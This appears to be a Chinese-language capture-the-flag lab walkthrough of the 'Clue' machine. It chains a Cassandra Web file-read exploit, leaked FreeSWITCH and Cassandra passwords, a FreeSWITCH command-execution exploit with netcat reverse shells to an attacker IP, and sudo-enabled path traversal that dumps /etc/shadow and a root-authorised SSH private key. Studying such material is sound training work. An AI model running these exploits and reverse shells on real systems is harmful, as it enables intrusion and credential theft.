OSCP靶场–Clue
考点(文件读取+读取配置中的密码+rce认证后利用+sudo 提权)
1.nmap扫描
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC -p- 192.168.163.240 --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-14 08:44 EDT
Nmap scan report for 192.168.163.240
Host is up (0.23s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 403 Forbidden
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3000/tcp open http Thin httpd
|_http-server-header: thin
|_http-title: Cassandra Web
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
Service Info: Hosts: 127.0.0.1, CLUE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m36s, median: 0s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-03-14T12:45:20
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: clue
| NetBIOS computer name: CLUE\x00
| Domain name: pg
| FQDN: clue.pg
|_ System time: 2024-03-14T08:45:21-04:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.74 seconds
2.user priv
2.1 cassandra web文件读取漏洞
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit cassandra
---------------------------------------------------------------------------------------
Exploit Title
---------------------------------------------------------------------------------------
Atrium Software Cassandra NNTP Server 1.10 - Buffer Overflow
Cassandra Web 0.5.0 - Remote File Read
---------------------------------------------------------------------------------------
Shellcodes: No Results
Papers: No Results
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m linux/webapps/49362.py
Exploit: Cassandra Web 0.5.0 - Remote File Read
URL: https://www.exploit-db.com/exploits/49362
Path: /usr/share/exploitdb/exploits/linux/webapps/49362.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /root/Desktop/49362.py
##
┌──(root㉿kali)-[~/Desktop]
└─# python 49362.py
usage: 49362.py [-h] [-p PORT] [-f] [-n NUMBER] target file
49362.py: error: the following arguments are required: target, file
┌──(root㉿kali)-[~/Desktop]
└─# python 49362.py 192.168.163.240 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ntp:x:106:113::/nonexistent:/usr/sbin/nologin
cassandra:x:107:114:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin
cassie:x:1000:1000::/home/cassie:/bin/bash
freeswitch:x:998:998:FreeSWITCH:/var/lib/freeswitch:/bin/false
anthony:x:1001:1001::/home/anthony:/bin/bash
2.2 文件读取漏洞尝试读取私钥id_rsa
## 读取私钥失败:
┌──(root㉿kali)-[~/Desktop]
└─# python 49362.py 192.168.163.240 /home/cassie/.ssh/id_rsa
Failed to read /home/cassie/.ssh/id_rsa (bad path?)
┌──(root㉿kali)-[~/Desktop]
└─# python 49362.py 192.168.163.240 /home/anthony/.ssh/id_rsa
Failed to read /home/anthony/.ssh/id_rsa (bad path?)
┌──(root㉿kali)-[~/Desktop]
└─# python 49362.py 192.168.163.240 /root/.ssh/id_rsa
Failed to read /root/.ssh/id_rsa (bad path?)
2.3 读取cassandra的用户名与密码:
## cassandra web没有登陆口:
┌──(root㉿kali)-[~/Desktop]
└─# python 49362.py 192.168.207.240 /proc/self/cmdline
/usr/bin/ruby2.5/usr/local/bin/cassandra-web-ucassie-pSecondBiteTheApple330
## 此处注意:凭据为[没有前面的第一个字符]cassie:SecondBiteTheApple330
2.4 读取FreeSWITCH的密码:发现FreeSwitch的rce漏洞:
## 读取FreeSWITCH的密码
https://inextrix.atlassian.net/wiki/spaces/ASTPP/pages/5572241/How+to+change+FreeSWITCH+event+socket+password
https://www.cnblogs.com/garvenc/p/freeswitch_learning_xml_configuration_file.html
## 凭据路径:
/etc/freeswitch/autoload_configs/event_socket.conf.xml
##############
##
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit FreeSWITCH
----------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit) | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution | windows/remote/47799.txt
----------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m windows/remote/47799.txt
Exploit: FreeSWITCH 1.10.1 - Command Execution
URL: https://www.exploit-db.com/exploits/47799
Path: /usr/share/exploitdb/exploits/windows/remote/47799.txt
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /root/Desktop/47799.txt
##
┌──(root㉿kali)-[~/Desktop]
└─# mv 47799.txt 47799.py
┌──(root㉿kali)-[~/Desktop]
└─# python 49362.py 192.168.207.240 /etc/freeswitch/autoload_configs/event_socket.conf.xml
<configuration name="event_socket.conf" description="Socket Client">
<settings>
<param name="nat-map" value="false"/>
<param name="listen-ip" value="0.0.0.0"/>
<param name="listen-port" value="8021"/>
<param name="password" value="StrongClueConEight021"/>
</settings>
</configuration>
### 记录密码: StrongClueConEight021,并修改exp中密码部分代码:
## 利用rce漏洞getshell:
┌──(root㉿kali)-[~/Desktop]
└─# python 47799.py 192.168.207.240 id
Authenticated
Content-Type: api/response
Content-Length: 63
uid=998(freeswitch) gid=998(freeswitch) groups=998(freeswitch)
########
## 反弹shell:
┌──(root㉿kali)-[~/Desktop]
└─# python 47799.py 192.168.207.240 'nc 192.168.45.214 3000 -e /bin/bash'
Authenticated
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 3000
listening on [any] 3000 ...
192.168.207.240: inverse host lookup failed: Unknown host
connect to [192.168.45.158] from (UNKNOWN) [192.168.207.240] 44456
python3 -c 'import pty;pty.spawn("bash")'
freeswitch@clue:/$ id&ifconfig
id&ifconfig
[1] 1581
uid=998(freeswitch) gid=998(freeswitch) groups=998(freeswitch)
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.207.240 netmask 255.255.255.0 broadcast 192.168.207.255
ether 00:50:56:ba:f3:c8 txqueuelen 1000 (Ethernet)
RX packets 7602 bytes 723159 (706.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8643 bytes 865317 (845.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 812 bytes 103016 (100.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 812 bytes 103016 (100.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
[1]+ Done id
freeswitch@clue:/$
3. root priv
### 使用cassandra的凭据切换到用户cassie:SecondBiteTheApple330
freeswitch@clue:/tmp$ su cassie
su cassie
Password: SecondBiteTheApple330
cassie@clue:/tmp$ sudo -l
sudo -l
Matching Defaults entries for cassie on clue:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cassie may run the following commands on clue:
(ALL) NOPASSWD: /usr/local/bin/cassandra-web
## 建立本地监听
cassie@clue:/var/lib/freeswitch$ sudo /usr/local/bin/cassandra-web -B 0.0.0.0:5555 -u cassie -p SecondBiteTheApple330
< -B 0.0.0.0:5555 -u cassie -p SecondBiteTheApple330
I, [2024-03-24T06:54:01.329180 #1612] INFO -- : Establishing control connection
I, [2024-03-24T06:54:01.405887 #1612] INFO -- : Refreshing connected host's metadata
I, [2024-03-24T06:54:01.411762 #1612] INFO -- : Completed refreshing connected host's metadata
I, [2024-03-24T06:54:01.412305 #1612] INFO -- : Refreshing peers metadata
I, [2024-03-24T06:54:01.413956 #1612] INFO -- : Completed refreshing peers metadata
I, [2024-03-24T06:54:01.413983 #1612] INFO -- : Refreshing schema
I, [2024-03-24T06:54:01.438174 #1612] INFO -- : Schema refreshed
I, [2024-03-24T06:54:01.438211 #1612] INFO -- : Control connection established
I, [2024-03-24T06:54:01.438417 #1612] INFO -- : Creating session
I, [2024-03-24T06:54:01.527357 #1612] INFO -- : Session created
2024-03-24 06:54:01 -0400 Thin web server (v1.8.1 codename Infinite Smoothie)
2024-03-24 06:54:01 -0400 Maximum connections set to 1024
2024-03-24 06:54:01 -0400 Listening on 0.0.0.0:5555, CTRL+C to stop
## 建立另一个shell:
┌──(root㉿kali)-[~/Desktop]
└─# python 47799.py 192.168.207.240 'nc 192.168.45.214 8021 -e /bin/bash'
Authenticated
## 可以读写高权限文件:
cassie@clue:/$ curl --path-as-is http://127.0.0.1:5555/../../../../../../../../../../../../etc/shadow
<5555/../../../../../../../../../../../../etc/shadow
root:$6$kuXiAC8PIOY2uis9$LrTzlkYSlY485ZREBLW5iPSpNxamM38BL85BPmaIAWp05VlV.tdq0EryiFLbLryvbsGTx50dLnMsxIk7PJB5P1:19209:0:99999:7:::
daemon:*:18555:0:99999:7:::
bin:*:18555:0:99999:7:::
sys:*:18555:0:99999:7:::
## 查看Anthony的.bash_history文件后,我知道root用户可能拥有与Anthony的私钥对应的授权密钥。
## 从命令可以看出anthony的公钥写入到了root的公钥中:
cassie@clue:/$ curl --path-as-is http://127.0.0.1:5555/../../../../../../../../../../../../home/anthony/.bash_history
clear
ls -la
ssh-keygen
cp .ssh/id_rsa.pub .ssh/authorized_keys
sudo cp .ssh/id_rsa.pub /root/.ssh/authorized_keys
exit
##
cassie@clue:/$ curl --path-as-is http://127.0.0.1:5555/../../../../../../../../../../../../home/anthony/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAw59iC+ySJ9F/xWp8QVkvBva2nCFikZ0VT7hkhtAxujRRqKjhLKJe
d19FBjwkeSg+PevKIzrBVr0JQuEPJ1C9NCxRsp91xECMK3hGh/DBdfh1FrQACtS4oOdzdM
jWyB00P1JPdEM4ojwzPu0CcduuV0kVJDndtsDqAcLJr+Ls8zYo376zCyJuCCBonPVitr2m
B6KWILv/ajKwbgrNMZpQb8prHL3lRIVabjaSv0bITx1KMeyaya+K+Dz84Vu8uHNFJO0rhq
gBAGtUgBJNJWa9EZtwws9PtsLIOzyZYrQTOTq4+q/FFpAKfbsNdqUe445FkvPmryyx7If/
DaMoSYSPhwAAA8gc9JxpHPScaQAAAAdzc2gtcnNhAAABAQDDn2IL7JIn0X/FanxBWS8G9r
acIWKRnRVPuGSG0DG6NFGoqOEsol53X0UGPCR5KD4968ojOsFWvQlC4Q8nUL00LFGyn3XE
QIwreEaH8MF1+HUWtAAK1Lig53N0yNbIHTQ/Uk90QziiPDM+7QJx265XSRUkOd22wOoBws
mv4uzzNijfvrMLIm4IIGic9WK2vaYHopYgu/9qMrBuCs0xmlBvymscveVEhVpuNpK/RshP
HUox7JrJr4r4PPzhW7y4c0Uk7SuGqAEAa1SAEk0lZr0Rm3DCz0+2wsg7PJlitBM5Orj6r8
UWkAp9uw12pR7jjkWS8+avLLHsh/8NoyhJhI+HAAAAAwEAAQAAAQBjswJsY1il9I7zFW9Y
etSN7wVok1dCMVXgOHD7iHYfmXSYyeFhNyuAGUz7fYF1Qj5enqJ5zAMnataigEOR3QNg6M
mGiOCjceY+bWE8/UYMEuHR/VEcNAgY8X0VYxqcCM5NC201KuFdReM0SeT6FGVJVRTyTo+i
CbX5ycWy36u109ncxnDrxJvvb7xROxQ/dCrusF2uVuejUtI4uX1eeqZy3Rb3GPVI4Ttq0+
0hu6jNH4YCYU3SGdwTDz/UJIh9/10OJYsuKcDPBlYwT7mw2QmES3IACPpW8KZAigSLM4fG
Y2Ej3uwX8g6pku6P6ecgwmE2jYPP4c/TMU7TLuSAT9TpAAAAgG46HP7WIX+Hjdjuxa2/2C
gX/VSpkzFcdARj51oG4bgXW33pkoXWHvt/iIz8ahHqZB4dniCjHVzjm2hiXwbUvvnKMrCG
krIAfZcUP7Ng/pb1wmqz14lNwuhj9WUhoVJFgYk14knZhC2v2dPdZ8BZ3dqBnfQl0IfR9b
yyQzy+CLBRAAAAgQD7g2V+1vlb8MEyIhQJsSxPGA8Ge05HJDKmaiwC2o+L3Er1dlktm/Ys
kBW5hWiVwWoeCUAmUcNgFHMFs5nIZnWBwUhgukrdGu3xXpipp9uyeYuuE0/jGob5SFHXvU
DEaXqE8Q9K14vb9by1RZaxWEMK6byndDNswtz9AeEwnCG0OwAAAIEAxxy/IMPfT3PUoknN
Q2N8D2WlFEYh0avw/VlqUiGTJE8K6lbzu6M0nxv+OI0i1BVR1zrd28BYphDOsAy6kZNBTU
iw4liAQFFhimnpld+7/8EBW1Oti8ZH5Mx8RdsxYtzBlC2uDyblKrG030Nk0EHNpcG6kRVj
4oGMJpv1aeQnWSUAAAAMYW50aG9ueUBjbHVlAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
##
┌──(root㉿kali)-[~/Desktop]
└─# ssh -i id_rsa root@192.168.207.240
Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Aug 11 04:35:06 2022 from 127.0.0.1
root@clue:~# id
uid=0(root) gid=0(root) groups=0(root)
4.总结:
## writeup
https://medium.com/@manhon.keung/proving-grounds-practice-linux-box-clue-c5d3a3b825d2
## cassandra hacktricks
https://book.hacktricks.xyz/v/cn/network-services-pentesting/cassandra
